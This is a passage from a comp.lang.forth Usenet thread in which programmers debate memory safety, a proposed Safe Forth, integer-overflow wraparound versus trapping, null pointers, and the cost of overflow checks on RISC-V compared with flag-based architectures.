    minforth@gmx.net (minforth) writes:
    IIRC there have been a few Forth applications at NASA and for astronomy
    (e.g. see Forth Inc. web site).

    I wonder if any of those applications were written in the current
    century.

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From Tristan Wibberley@21:1/5 to Anton Ertl on Mon Mar 4 23:03:55 2024
    On 01/03/2024 18:02, Anton Ertl wrote:
    mhx@iae.nl (mhx) writes:
    What if the program writes a float to a byte location?

    That's not a safety problem (as long as the location is big enough for
    the float), so one can design a Safe Forth variant that allows that.

    I'm not very familiar with forth yet, does this refer to writing to a
    machine addressed location? If so, plenty of computers have alignment requirements, a DoS can be introduced by the above action.

    Also, if you write a byte to a float location, a variety of problems can
    be introduced including running trap callbacks that were insufficiently
    tested for the new program state, etc, killing the process and running
    restart sequences where less volatile state can now be in an unusual
    condition and new side-effects induced, and so on.

    memory safety means maintaining invariant relations wrt. each memory
    location.

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From Paul Rubin@21:1/5 to dxf on Mon Mar 4 21:17:21 2024
    dxf <dxforth@gmail.com> writes:
    Yes but asking the system to find errors isn't looking - it's covering
    one's butt.

    If the implementer doesn't find them and the system doesn't find them,
    that leaves them for the attackers to find. Wasn't that what you were
    asking about? We are learning that the best way to prevent attackers
    from finding such errors is to use tools (e.g. languages) that prevent
    those errors from occurring in the first place.

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From Tristan Wibberley@21:1/5 to Anton Ertl on Tue Mar 5 07:58:20 2024
    On 05/03/2024 06:35, Anton Ertl wrote:
    Tristan Wibberley <tristan.wibberley+netnews2@alumni.manchester.ac.uk> writes:

    ...

    If so, plenty of computers have alignment
    requirements,

    In general-purpose computers, that used to be the case in the 1990s,
    but nowadays it is no longer the case. We have to use really old
    hardware to test against alignment errors. ...

    Or special purpose computers that are not mass marketed, but I wasn't
    aware they'd fixed all the public market computers. Thanks for the info.

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From Anton Ertl@21:1/5 to Tristan Wibberley on Tue Mar 5 06:35:40 2024
    Tristan Wibberley <tristan.wibberley+netnews2@alumni.manchester.ac.uk> writes: >On 01/03/2024 18:02, Anton Ertl wrote:
    mhx@iae.nl (mhx) writes:
    What if the program writes a float to a byte location?

    That's not a safety problem (as long as the location is big enough for
    the float), so one can design a Safe Forth variant that allows that.

    I'm not very familiar with forth yet, does this refer to writing to a
    machine addressed location?

    Yes.

    If so, plenty of computers have alignment
    requirements,

    In general-purpose computers, that used to be the case in the 1990s,
    but nowadays it is no longer the case. We have to use really old
    hardware to test against alignment errors, and even on hardware that
    has alignment requirements (like our 21264B machine from 2000), the OS
    (Linux) emulates the behaviour of computers without these requirements
    when the program performs an unaligned access, and I had to write a
    special program to get signals for unaligned accesses <https://www.complang.tuwien.ac.at/anton/uace.c>. And while the Linux
    command setarch can turn on various compatibility features for old
    programs, such as turning off ASLR, it does not include a feature for
    making unaligned accesses trap on the appropriate hardware.

    In any case, if we want to avoid unaligned FP accesses, one can design
    a memory-safe Forth dialect such that it prevents unaligned FP
    accesses, but not accessing the same memory as bytes and as FP values.

    However, despite all that, my plan is to design Safe Forth in a way
    where the commonly-used words do not support such kinds of accesses,
    because the result will make most programming tasks easier. For
    specialized uses there may be words that just treat the memory as
    bytes, though.

    a DoS can be introduced by the above action.

    DoS and more serious vulnerabilities can be introduced in lots of ways
    in memory-safe programming languages, whether some mechanism prevents
    writing floats to a byte location or not.

    However, I should refine my sentence above to: "That's not a
    memory-safety problem ...".

    Also, if you write a byte to a float location, a variety of problems can
    be introduced including running trap callbacks that were insufficiently >tested for the new program state, etc, killing the process and running >restart sequences where less volatile state can now be in an unusual >condition and new side-effects induced, and so on.

    Memory safety does not guarantee bug-freedom.

    However, what you write appears to be a case of "Bedenkentraeger",
    imagining all kinds of possible or impossible problems in order to
    argue against something. In the present case, impossible problems:

    In Gforth no floating-point operation traps, and I intend to keep that behaviour for Safe Forth.

    There is also no way to write "trap callbacks". If there was, and a
    programmer used it, and it was insufficiently tested, the problem
    would be that the code was insufficiently tested, not in writing the
    byte to an address where later an FP value is read from.

    Because there is no trap and no trap callback, the process is not
    killed, and no restart sequence is run. If it was, the condition of process-surviving state would be something that would have to be made
    safe whether the system prevents accessing bytes and FP values at the
    same addresses or not.

    memory safety means maintaining invariant relations wrt. each memory >location.

    So?

    - anton
    --
    M. Anton Ertl http://www.complang.tuwien.ac.at/anton/home.html
    comp.lang.forth FAQs: http://www.complang.tuwien.ac.at/forth/faq/toc.html
    New standard: https://forth-standard.org/
    EuroForth 2023: https://euro.theforth.net/2023

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From minforth@21:1/5 to Tristan Wibberley on Tue Mar 5 14:03:46 2024
    Tristan Wibberley wrote:

    On 05/03/2024 06:35, Anton Ertl wrote:
    Tristan Wibberley <tristan.wibberley+netnews2@alumni.manchester.ac.uk> writes:

    ....

    If so, plenty of computers have alignment
    requirements,

    In general-purpose computers, that used to be the case in the 1990s,
    but nowadays it is no longer the case. We have to use really old
    hardware to test against alignment errors. ...

    Or special purpose computers that are not mass marketed, but I wasn't
    aware they'd fixed all the public market computers. Thanks for the info.

    You are still in for some nasty surprises with "public market" ARM CPUs.
    f.ex.
    https://developer.arm.com/documentation/den0013/d/Porting/Alignment

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From Paul Rubin@21:1/5 to dxf on Tue Mar 5 10:03:15 2024
    dxf <dxforth@gmail.com> writes:
    AFAIK hacks are opportunistic i.e. could not reasonably be foreseen.
    Such "errors" are forgivable. Not so, programmers who either don't
    know where something might overflow, or knowing, fail to address it.

    Humans make errors. The world's smartest mathematicians have published
    proofs with mistakes. Today, there is a community that likes to
    machine-check math proofs to make sure they are sound. It's the same
    thing with memory-safe languages. We don't have practical ways to make
    sure programs are free of all errors, but we can make sure they are free
    of some common and significant types of them.

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From Paul Rubin@21:1/5 to Hans Bezemer on Tue Mar 5 10:40:09 2024
    Hans Bezemer <the.beez.speaks@gmail.com> writes:
    If you think you will revive Forth by jumping on that Rust bandwagon,
    I think you're wrong.

    Probably true, Forth users want something different than what Rust aims
    to supply.

    First and foremost, because I think Rust is the wrong idea. It's been
    tried before - Ada, Pascal, Java - in some sense: BASIC.

    BASIC's heyday was before my time, but it was very popular in a certain
    crowd. Java was extremely successful in industry and I think it was at
    the top of TIOBE for a while (it is #4 now). #1 is currently Python
    which can be seen as a successor to BASIC. Pascal was intentionally
    limited (it was intended as an instructional language) and yet it had
    its own era of popularity because of Turbo Pascal and the P-system.

    Ada was overcomplicated, but I think it also didn't gain traction
    because the early Ada compilers were slow and expensive. If GNAT had
    been available from the beginning, Ada would have gotten more use, imho.

    Good programmers exist because they are good programmers. Bad programs
    exist because of bad programmers.

    The best programmers I know have released code with memory errors, so at
    a certain point you have to stop blaming the human for being less
    accurate than a machine.


    "Ada will not meet its major objective... for it is so complicated
    that it defies the unambiguous definition that is essential for these purposes.

    It's not particularly more complicated than C++ as far as I can tell,
    and C++ is currently #3 on TIOBE.

    "...for it is so complicated...". That is the very definition of Rust.

    All the time you're spending getting your code to compile, you're not creating programs.

    Would you say the same of time you spend fixing bugs that you find
    during testing?

    I'd say that's the reverse of productivity. The higher the
    abstraction, the more difficult it is to understand - let alone to
    teach.

    Picking the right level of abstraction to handle a problem is an
    important skill in programming just like it is in math. We spend a lot
    of time studying abstractions in math because they are useful. That
    turns out to be true in programming as well.

    Lifetimes? Borrowing? Are you kidding me?

    This is just the language handling and checking an abstraction that
    people have been doing manually long before Rust. If you look at the
    CPython implementation, it does memory management by reference counting,
    and it constantly uses the ideas of borrowed references internally.

    I would say today though, most application programmers don't need Rust.
    They will be more productive with garbage collected languages, at the
    expense of some machine resources. Rust is for when those resources
    can't be spared.

    So, safety, yes. I like that very much. I ventured into that very
    early and I never regretted it. But apart from some basic checks it
    should stop at the point where I have to convince a compiler that I
    know what I'm doing.

    I see it the other way. If the compiler can find every error in my
    program of type X, then simply fixing the program until the compiler
    accepts it means I get a program that is free of that type of error.
    That increases my confidence in the program. The trade-off is that such features can make the language and the compiler harder to use. A big
    part of research in languages is widening the classes of errors that the compiler can check without the language becoming too difficult.

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From minforth@21:1/5 to Hans Bezemer on Tue Mar 5 18:32:03 2024
    Hans Bezemer wrote:
    I tend to trust my Forth programs a lot more than my C ones

    Maybe you're a lousy, careless C programmer? (pun intended ;-))

    But I agree with you that the world doesn't need a Safe Forth.

    Still, everyone has their favourite baby (like you have your 4th)
    and you can still learn a few things while exploring additional
    security features and enjoy it for the intellectual exercise, as
    Anton seems to be doing with gforth.

    By the way, I don't want to go off on a tangent here. I use
    security features myself (not in MinForth though), because the
    cost of repairing faulty devices in remote locations are too high
    to be careless.

    The solution is a separate DSL (on top of a Forth nucleus) that
    does not allow any direct memory access. Very simple sandboxing.

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From Paul Rubin@21:1/5 to dxf on Tue Mar 5 16:54:24 2024
    dxf <dxforth@gmail.com> writes:
    At no time during its writing did I consider hackers or inept users. Responsible programming was all.

    Very nice. Back in the 1980s all of us did that. Then something called
    the internet came along, as did computerized banking and other systems
    which attracted highly competent malicious and/or financially motivated attackers. At that point, writing bulletproof code became not only much harder, but also vitally important. You now must ensure not only that
    your program can do what you intended, but that it can't do what you
    didn't intend. Bruce Schneier[1] wrote about security engineering:

    In many ways this is similar to safety engineering. ... But safety
    engineering involves making sure things do not fail in the presence
    of random faults: it’s about programming Murphy’s computer, if you
    will. Security engineering involves making sure things do not fail
    in the presence of an intelligent and malicious adversary who forces
    faults at precisely the worst time and in precisely the worst
    way. Security engineering involves programming Satan’s computer.
    And Satan’s computer is hard to test.

    [1] https://www.schneier.com/essays/archives/1999/11/why_computers_are_in.html

    So sure, if you're claiming that 1980s programming didn't benefit from
    memory safe languages, maybe you're right. Those of us who have to
    program in the 21st century, though, need all the help we can get.

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From minforth@21:1/5 to dxf on Wed Mar 6 08:23:53 2024
    dxf wrote:

    On 6/03/2024 11:54 am, Paul Rubin wrote:
    ...
    Those of us who have to
    program in the 21st century, though, need all the help we can get.

    "There is no hardware protection. Memory protection can be provided by
    the access computer. But I prefer software that is correct by design." - C.M.

    Conficious said:
    Use program that treats integer wraparound as good feature and find yourself in big heap of dung

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From minforth@21:1/5 to dxf on Wed Mar 6 09:32:29 2024
    dxf wrote:

    On 6/03/2024 7:23 pm, minforth wrote:
    dxf wrote:

    On 6/03/2024 11:54 am, Paul Rubin wrote:
    ... Those of us who have to
    program in the 21st century, though, need all the help we can get.

    "There is no hardware protection. Memory protection can be provided by
     the access computer. But I prefer software that is correct by design." - C.M.

    Conficious said:
    Use program that treats integer wraparound as good feature and find yourself in big heap of dung

    A 'memory-safe' system won't detect that. What now?

    Wrong separation. They are related: https://www.securecoding.com/blog/integer-overflow-attack-and-prevention/

    I've been bitten in the past. Among other things, I now often use
    range values, unknown to standard Forth, e.g. as array indices.

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From Paul Rubin@21:1/5 to dxf on Thu Mar 7 18:25:57 2024
    dxf <dxforth@gmail.com> writes:
    For example it's my experience one can input an out-of-range integer
    into C and Forth compilers and neither will notice.... Programmers
    too and I'm no exception.

    These days I'd call C and Forth both niche languages, the niche being
    low level systems code and small embedded programs. #1 on TIOBE is
    Python, which uses arbitrary precision as the native integer type. That
    slows arithmetic down but it mostly eliminates the overflow problem.

    IMHO that is what all high level languages should do by default. Of
    course native machine types and low level languages (C, Forth, Rust,
    Ada, etc.) should stay available for cases where you want to or have to
    program closer to the hardware.

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From Ron AARON@21:1/5 to Paul Rubin on Fri Mar 8 07:10:55 2024
    On 08/03/2024 4:25, Paul Rubin wrote:
    dxf <dxforth@gmail.com> writes:
    For example it's my experience one can input an out-of-range integer
    into C and Forth compilers and neither will notice.... Programmers
    too and I'm no exception.

    These days I'd call C and Forth both niche languages, the niche being
    low level systems code and small embedded programs. #1 on TIOBE is
    Python, which uses arbitrary precision as the native integer type. That slows arithmetic down but it mostly eliminates the overflow problem.

    IMHO that is what all high level languages should do by default. Of
    course native machine types and low level languages (C, Forth, Rust,
    Ada, etc.) should stay available for cases where you want to or have to program closer to the hardware.

    Just as an aside, 8th also does that. Numbers automatically grow as
    needed. Yes, it's slower than native integers/floats... but it's very convenient, and most of the time nobody notices the difference in speed.

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From Anton Ertl@21:1/5 to Paul Rubin on Sat Mar 9 11:30:56 2024
    Paul Rubin <no.email@nospam.invalid> writes:
    #1 on TIOBE is
    Python, which uses arbitrary precision as the native integer type. That >slows arithmetic down but it mostly eliminates the overflow problem.

    If implemented well, the slowdown is small in the common case (small
    integers): E.g., on AMD64 an add, sub, or imul instruction just needs
    to be followed by a jo which in the usual case is not taken and very predictable.

    Python (particularly CPython), however, does not seem to have gone for efficient implementation; I don't know what they do for arbitrarily
    large integers, but the inner interpreter was pretty monstrous last I
    looked.

    I have looked at the implementation of arbitrarily large integers in
    OpenJDK (could be better) and in the BC engine of Racket (could also
    be better, but the BC engine is on the back burner, and they have a
    JIT compiler as the main engine, but I did not find out how it
    implements arbitrarily large integers.

    But integer overflow is orthogonal to memory safety.

    There are many people who claim that wrapping behaviour for integer
    overflow is a problem. Java defines the basic types int and long to
    perform wraparound on overflow, and while Java has its own share of vulnerabilities (most prominently Log4Shell), I am not aware of one
    where the wraparound behaviour was involved (but then, I have not
    looked).

    - anton
    --
    M. Anton Ertl http://www.complang.tuwien.ac.at/anton/home.html
    comp.lang.forth FAQs: http://www.complang.tuwien.ac.at/forth/faq/toc.html
    New standard: https://forth-standard.org/
    EuroForth 2023: https://euro.theforth.net/2023

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From minforth@21:1/5 to All on Sat Mar 9 12:17:08 2024
    Years ago we had a crash with using old archived data files
    in a more recent system. The old file format relied on having
    max 64k (16bit) index size, while the evaluating system assumed
    24bit, and so the index overflowed the allocated memory space.
    In hindsight a trivial case, but it took a while to track it down.

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From Anton Ertl@21:1/5 to minforth on Sat Mar 9 17:27:45 2024
    minforth@gmx.net (minforth) writes:
    Years ago we had a crash with using old archived data files
    in a more recent system. The old file format relied on having
    max 64k (16bit) index size, while the evaluating system assumed
    24bit, and so the index overflowed the allocated memory space.

    Sounds like it would be caught by a memory-safe language, no integer
    overflow detection necessary; and it's actually not a case of integer
    overflow.

    - anton
    --
    M. Anton Ertl http://www.complang.tuwien.ac.at/anton/home.html
    comp.lang.forth FAQs: http://www.complang.tuwien.ac.at/forth/faq/toc.html
    New standard: https://forth-standard.org/
    EuroForth 2023: https://euro.theforth.net/2023

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From Anton Ertl@21:1/5 to Spiros Bousbouras on Sat Mar 9 17:01:30 2024
    Spiros Bousbouras <spibou@gmail.com> writes:
    On Sat, 09 Mar 2024 11:30:56 GMT
    anton@mips.complang.tuwien.ac.at (Anton Ertl) wrote:
    If implemented well, the slowdown is small in the common case (small
    integers): E.g., on AMD64 an add, sub, or imul instruction just needs
    to be followed by a jo which in the usual case is not taken and very
    predictable.

    Don't you also need to first check that both arguments are small
    integers ?

    Yes, at some point. If the same value is used several times in a
    piece of code, there is only one check needed before the first use; if
    a subsequent use is not dominated by the first use, you only need
    another check on those paths that bypass the first check, as in
    partial redundancy elimination, resulting in one check on any path
    that reaches a use of the value.

    - anton
    --
    M. Anton Ertl http://www.complang.tuwien.ac.at/anton/home.html
    comp.lang.forth FAQs: http://www.complang.tuwien.ac.at/forth/faq/toc.html
    New standard: https://forth-standard.org/
    EuroForth 2023: https://euro.theforth.net/2023

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From Paul Rubin@21:1/5 to Anton Ertl on Sat Mar 9 20:18:34 2024
    anton@mips.complang.tuwien.ac.at (Anton Ertl) writes:
    If implemented well, the slowdown is small in the common case (small integers): E.g., on AMD64 an add, sub, or imul instruction just needs
    to be followed by a jo which in the usual case is not taken and very predictable.

    It might be worse for RISC V. Either way though, you need either boxed integers or tag bits.

    Python (particularly CPython), however, does not seem to have gone for efficient implementation;

    CPython's implementation is not very good, but there is or was a gmpy
    module that let you use GMP for fast bignum arithmetic. I remember in
    the Python 2.2 era it was 3x or 4x faster than CPython bignums. But, I
    think it has since fallen into non-maintenance and bit rot.

    I don't know what they do for arbitrarily large integers, but the
    inner interpreter was pretty monstrous last I looked.

    CPython has a fairly straightforward bytecode interpreter.

    But integer overflow is orthogonal to memory safety.
    There are many people who claim that wrapping behaviour for integer
    overflow is a problem.

    It has a problem because it's wrong! Of course it's deterministic
    instead of being UB, and that makes some people feel better, but making
    2+2=5 is also deterministic yet wrong. At least with UB, the
    implementation can have a setting to do the right thing and trap the
    overflow, instead of being mandated to quietly give wrong results.

    Imagine x is a 50 element array and for whatever reason you try to
    update x[60]. So the implementation might clobber 10 elements past the
    end of the array (bad), or it can signal an error (the only thing that
    makes sense), or in a feat of Java-like brilliance it might alias x[60]
    to x[10] since 60 is 10 mod 50. That seems completely silly to me as a
    default behaviour. Integer overflow wraparound is more of the same.

    Yes there are situations like circular buffers where you might want that wraparound, just like there are situations like hash functions where you
    want machine word wraparound, but those are special enough to call for
    explicit declarations.


    Java defines the basic types int and long to perform wraparound on
    overflow,

    Yes, a mistake IMHO. The one language that I know of that gets this
    right is Ada. The default behavior is signal on overflow, but you can
    specify wraparound (with any modulus you wish) if that is what your
    application wants. If your modulus happens to be 2**32 or whatever, the compiler recognizes this and generates the efficient machine code you
    would expect.

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From minforth@21:1/5 to All on Sun Mar 10 08:15:48 2024
    Excellent summary.

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From Anton Ertl@21:1/5 to Paul Rubin on Sun Mar 10 08:29:13 2024
    Paul Rubin <no.email@nospam.invalid> writes:
    anton@mips.complang.tuwien.ac.at (Anton Ertl) writes:
    If implemented well, the slowdown is small in the common case (small
    integers): E.g., on AMD64 an add, sub, or imul instruction just needs
    to be followed by a jo which in the usual case is not taken and very
    predictable.

    It might be worse for RISC V.

    It is. That's a failure of RISC-V.

    I don't know what they do for arbitrarily large integers, but the
    inner interpreter was pretty monstrous last I looked.

    CPython has a fairly straightforward bytecode interpreter.

    When I last looked, the inner interpreter dispatch was huge, covering
    the screen (maybe 50-100 lines), with lots of special cases for
    various things.

    But integer overflow is orthogonal to memory safety.
    There are many people who claim that wrapping behaviour for integer
    overflow is a problem.

    It has a problem because it's wrong! Of course it's deterministic
    instead of being UB, and that makes some people feel better, but making
    2+2=5 is also deterministic yet wrong.

    In Java 2+2 gives 4. What do you hope to gain by putting up straw men?

    Imagine x is a 50 element array and for whatever reason you try to
    update x[60].

    That is a memory-safety issue, and what Java gives you in the case is
    something like throwing an ArrayIndexOutOfBoundsException.

    So the implementation might clobber 10 elements past the
    end of the array (bad), or it can signal an error (the only thing that
    makes sense), or in a feat of Java-like brilliance it might alias x[60]
    to x[10] since 60 is 10 mod 50.

    Java does not do that. What do you hope to gain by putting up straw
    men?

    Java defines the basic types int and long to perform wraparound on
    overflow,

    Yes, a mistake IMHO.

    You just have no arguments but "It's wrong!" and straw men to back up
    your opinion.

    - anton
    --
    M. Anton Ertl http://www.complang.tuwien.ac.at/anton/home.html
    comp.lang.forth FAQs: http://www.complang.tuwien.ac.at/forth/faq/toc.html
    New standard: https://forth-standard.org/
    EuroForth 2023: https://euro.theforth.net/2023

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From Paul Rubin@21:1/5 to Anton Ertl on Sun Mar 10 01:56:08 2024
    anton@mips.complang.tuwien.ac.at (Anton Ertl) writes:
    2+2=5 is also deterministic yet wrong.
    In Java 2+2 gives 4. What do you hope to gain by putting up straw men?

    2+2=5 is obviously wrong and Java doesn't go quite that far. Java
    instead insists that you can add two positive integers and get a
    negative one. That's wrong the same way that 2+2=5 is. It just doesn't
    mess up actual programs as often, because the numbers involved are
    bigger.

    You just have no arguments but "It's wrong!" and straw men to back up
    your opinion.

    In what world can it be right for n to be a positive integer and n+1 to
    be a negative integer? That's not how integers work.

    Tony Hoare in 2009 said about null pointers:

    I call it my billion-dollar mistake. It was the invention of the
    null reference in 1965. At that time, I was designing the first
    comprehensive type system for references in an object oriented
    language (ALGOL W). My goal was to ensure that all use of references
    should be absolutely safe, with checking performed automatically by
    the compiler. But I couldn't resist the temptation to put in a null
    reference, simply because it was so easy to implement. This has led
    to innumerable errors, vulnerabilities, and system crashes, which
    have probably caused a billion dollars of pain and damage in the
    last forty years.

    That is, C and other such languages have null pointers because they corresponded so conveniently to machine operations that the language
    designers couldn't resist including them. Java-style wraparound
    arithmetic is more of the same. A bug magnet, but irresistibly
    convenient for the implementers because of its isomorphism to machine arithmetic.

    Java also has null pointers, another possible mistake. Ada doesn't have
    them, nor does Python etc. C++ has them because of its C heritage and
    the need to support legacy code, but I believe that in "modern" C++
    style you're supposed to use references instead of pointers, so you
    can't have a null or uninitialized one.

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From Paul Rubin@21:1/5 to Hans Bezemer on Sun Mar 10 13:03:04 2024
    Hans Bezemer <the.beez.speaks@gmail.com> writes:
    Any number representation has its problems - since there is no way to properly represent infinite precision.

    That's exactly the idea here. If the computer runs out of memory in a
    bignum system, that is unquestionably an error condition. In a low
    level system where the representation limit is fitting in a machine word
    rather than having the whole computer memory available, the same error condition occurs if the machine word doesn't have enough bits.

    Exclamations like "BUT IT'S WRONG" may be correct, but without a true alternative it's not gonna change much.

    The true alternative is to treat overflow as an error condition, as
    Ada does, and as languages with bignums do, and as even C does (C at
    least permits the implementation to do the right thing, although it
    doesn't require it to).

    It depends a lot on how error checking is handled. You could return it
    like "errno" or perror(). You could throw an exception. You could
    return some special value - like a NULL pointer.

    You could also use something like std::optional so that static analysis
    can notify you if you don't handle the error case. Haskell in principle
    does even better, letting type inference determine the error handling
    strategy:

    https://blogs.perl.org/users/ovid/2010/08/what-to-know-before-debating-type-systems.html

    See the section "Fallacy: Static types imply longer code".

    std::ofstream file("example.txt");
    if (!file.is_open()) {

    I have the impression that this is legacy design leaking through, but
    I'm not a C++ expert by any means. See also the term "boolean blindness".

    I mean, NULL is already a macro, it shouldn't be difficult to
    gravitate to a better value.

    The trouble is that the pointer datatype doesn't distinguish NULL from
    valid addresses. A static analyzer could have an internal database of functions whose return values should be checked against NULL, but it's
    better to make it explicit in the datatype.

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From albert@spenarnc.xs4all.nl@21:1/5 to Anton Ertl on Mon Mar 11 11:15:56 2024
    In article <2024Mar10.092913@mips.complang.tuwien.ac.at>,
    Anton Ertl <anton@mips.complang.tuwien.ac.at> wrote:
    Paul Rubin <no.email@nospam.invalid> writes: >>anton@mips.complang.tuwien.ac.at (Anton Ertl) writes:
    If implemented well, the slowdown is small in the common case (small
    integers): E.g., on AMD64 an add, sub, or imul instruction just needs
    to be followed by a jo which in the usual case is not taken and very
    predictable.

    It might be worse for RISC V.

    It is. That's a failure of RISC-V.

    As far as I can tell it was a design choice for DEC Alpha and RISC-V. Apparently flags are detrimental to parallelism.

    You can't call that a failure because you don't like it.


    Groetjes Albert
    --
    Don't praise the day before the evening. One swallow doesn't make spring.
    You must not say "hey" before you have crossed the bridge. Don't sell the
    hide of the bear until you shot it. Better one bird in the hand than ten in
    the air. First gain is a cat purring. - the Wise from Antrim -

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From Anton Ertl@21:1/5 to albert@spenarnc.xs4all.nl on Mon Mar 11 17:40:20 2024
    albert@spenarnc.xs4all.nl writes:
    In article <2024Mar10.092913@mips.complang.tuwien.ac.at>,
    Anton Ertl <anton@mips.complang.tuwien.ac.at> wrote:
    Paul Rubin <no.email@nospam.invalid> writes: >>>anton@mips.complang.tuwien.ac.at (Anton Ertl) writes:
    If implemented well, the slowdown is small in the common case (small
    integers): E.g., on AMD64 an add, sub, or imul instruction just needs
    to be followed by a jo which in the usual case is not taken and very
    predictable.

    It might be worse for RISC V.

    It is. That's a failure of RISC-V.

    As far as I can tell it was a design choice for DEC Alpha and RISC-V.

    And MIPS.

    Apparently flags are detrimental to parallelism.

    Reality check: No MIPS, Alpha, or RISC-V ever has had as much
    instruction-level parallelism as contemporaneous CPUs for
    architectures with flags, so flags are obviously not detrimental to instruction-level parallelism.

    Look at
    <http://www.complang.tuwien.ac.at/anton/tmp/opt-ipc-uarch.eps>: The
    dashed orange line near the bottom is U74, a RISC-V implementation.
    The other lines are all for CPU cores with flags.

    If you want to do several parallel multi-precision additions, say, if
    you want a multi-precision addition a+b+c+d, having one (ARM A64) or
    two (AMD64 with ADX) carry flags does indeed limit the parallelism,
    but the MIPS/Alpha/RISC-V answer is to replace one ADCX/ADOX
    instruction (one cycle latency) with five instructions with typically
    three cycles of latency.

    On AMD64 with ADX, a 6400-bit addition of a+b+c+d can be split into
    two chains: t=a+b+c and t+d; this has a total latency of about 200
    cycles (actually OoO execution can reduce this somewhat by overlapping
    the two chains to a certain extent), while the MIPS/Alpha/RISC-V
    approach takes 300 cycles of latency with no chance of additional
    overlap within that computation.

    You will need >6 parallel multi-precision additions before the two
    carry flags of AMD64 with ADX are theoretically more limiting than the MIPS/Alpha/RISC-V approach. And to be practically more limiting, the
    RISC-V implementation needs to be extremely wide (>36 instructions per
    cycle) and the precision must be extremely high (to eliminate overlap
    between chains as an issue).

    You can't call that a failure because you don't like it.

    The correct english term is that it's the *fault* of RISC-V. They
    took a deliberate decision to need more instructions for implementing
    overflow checks than other architectures, so it's their
    responsibility, and for those who want to use big integers (or who
    want to trap on signed overflow), their fault.

    For an alternative to the RISC-V approach that is not as limiting as
    the ARM A64 and AMD64 approaches, read:

    http://www.complang.tuwien.ac.at/anton/tmp/carry.pdf

    (not published yet)

    - anton
    --
    M. Anton Ertl http://www.complang.tuwien.ac.at/anton/home.html
    comp.lang.forth FAQs: http://www.complang.tuwien.ac.at/forth/faq/toc.html
    New standard: https://forth-standard.org/
    EuroForth 2023: https://euro.theforth.net/2023

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From mhx@21:1/5 to All on Mon Mar 11 18:50:36 2024
    No / not yet?
    "The requested URL /anton/tmp/opt-ipc-uarch.eps : was not found on this server."

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From Anton Ertl@21:1/5 to Anton Ertl on Mon Mar 11 20:53:54 2024
    anton@mips.complang.tuwien.ac.at (Anton Ertl) writes:
    You will need >6 parallel multi-precision additions before the two
    carry flags of AMD64 with ADX are theoretically more limiting than the >MIPS/Alpha/RISC-V approach. And to be practically more limiting, the
    RISC-V implementation needs to be extremely wide (>36 instructions per
    cycle) and the precision must be extremely high (to eliminate overlap
    between chains as an issue).

    Correction: For performing >6 parallel multi-precision additions at a
    rate of >6 steps every 3 cycles, >36 instructions are needed only
    every 3 cycles with the MIPS/Alpha/RISC-V approach, i.e. >12 instructions/cycle.

    - anton
    --
    M. Anton Ertl http://www.complang.tuwien.ac.at/anton/home.html
    comp.lang.forth FAQs: http://www.complang.tuwien.ac.at/forth/faq/toc.html
    New standard: https://forth-standard.org/
    EuroForth 2023: https://euro.theforth.net/2023

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From Anton Ertl@21:1/5 to mhx on Mon Mar 11 20:51:46 2024
    mhx@iae.nl (mhx) writes:
    No / not yet?
    "The requested URL /anton/tmp/opt-ipc-uarch.eps : was not found on this server."

    Works for me:

    wget http://www.complang.tuwien.ac.at/anton/tmp/opt-ipc-uarch.eps
    --2024-03-11 21:49:20-- http://www.complang.tuwien.ac.at/anton/tmp/opt-ipc-uarch.eps
    Resolving www.complang.tuwien.ac.at (www.complang.tuwien.ac.at)... 128.130.173.64
    Connecting to www.complang.tuwien.ac.at (www.complang.tuwien.ac.at)|128.130.173.64|:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 2255987 (2.2M) [application/postscript]
    Saving to: ‘opt-ipc-uarch.eps’

    opt-ipc-uarch.eps 100%[===================>] 2.15M 8.38MB/s in 0.3s

    - anton
    --
    M. Anton Ertl http://www.complang.tuwien.ac.at/anton/home.html
    comp.lang.forth FAQs: http://www.complang.tuwien.ac.at/forth/faq/toc.html
    New standard: https://forth-standard.org/
    EuroForth 2023: https://euro.theforth.net/2023

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From Anton Ertl@21:1/5 to Paul Rubin on Mon Mar 11 21:08:43 2024
    Paul Rubin <no.email@nospam.invalid> writes:
